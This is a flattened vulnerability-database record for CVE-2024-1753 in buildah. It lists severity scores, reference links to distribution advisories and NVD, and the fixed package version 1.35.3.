scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KOYMVMQ7RWMDTSKQTBO734BE3WQPI2AJ
28
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZVBSVZGVABPYIHK5HZM472NPGWMI7WXH
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZVBSVZGVABPYIHK5HZM472NPGWMI7WXH
29
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-1753
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-1753
30
reference_url https://pkg.go.dev/vuln/GO-2024-2658
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://pkg.go.dev/vuln/GO-2024-2658
31
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067800
reference_id 1067800
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067800
32
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:8::appstream
reference_id cpe:/a:redhat:enterprise_linux:8::appstream
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:8::appstream
33
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:9::appstream
reference_id cpe:/a:redhat:enterprise_linux:9::appstream
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:9::appstream
34
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:3.11
reference_id cpe:/a:redhat:openshift:3.11
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:3.11
35
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el8
reference_id cpe:/a:redhat:openshift:4.12::el8
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el8
36
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el9
reference_id cpe:/a:redhat:openshift:4.12::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el9
37
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el8
reference_id cpe:/a:redhat:openshift:4.13::el8
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el8
38
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el9
reference_id cpe:/a:redhat:openshift:4.13::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el9
39
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el8
reference_id cpe:/a:redhat:openshift:4.14::el8
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el8
40
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el9
reference_id cpe:/a:redhat:openshift:4.14::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el9
41
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el8
reference_id cpe:/a:redhat:openshift:4.15::el8
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el8
42
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el9
reference_id cpe:/a:redhat:openshift:4.15::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el9
43
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:8.6::appstream
reference_id cpe:/a:redhat:rhel_eus:8.6::appstream
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:8.6::appstream
44
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:8.8::appstream
reference_id cpe:/a:redhat:rhel_eus:8.8::appstream
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:8.8::appstream
45
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:9.0::appstream
reference_id cpe:/a:redhat:rhel_eus:9.0::appstream
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:9.0::appstream
46
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:9.2::appstream
reference_id cpe:/a:redhat:rhel_eus:9.2::appstream
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:9.2::appstream
47
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:7
reference_id cpe:/o:redhat:enterprise_linux:7
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:7
48
reference_url https://security.gentoo.org/glsa/202407-12
reference_id GLSA-202407-12
reference_type
scores
url https://security.gentoo.org/glsa/202407-12
49
reference_url https://security.gentoo.org/glsa/202407-25
reference_id GLSA-202407-25
reference_type
scores
url https://security.gentoo.org/glsa/202407-25
fixed_packages
0
url pkg:ebuild/app-containers/buildah@1.35.3
purl pkg:ebuild/app-containers/buildah@1.35.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:ebuild/app-containers/buildah@1.35.3
aliases CVE-2024-1753, GHSA-874v-pj72-92f3
risk_score 3.9
exploitability 0.5
weighted_severity 7.7
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-gyyv-8fkv-syh5
Risk_scorenull
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:ebuild/app-containers/buildah@1.35.3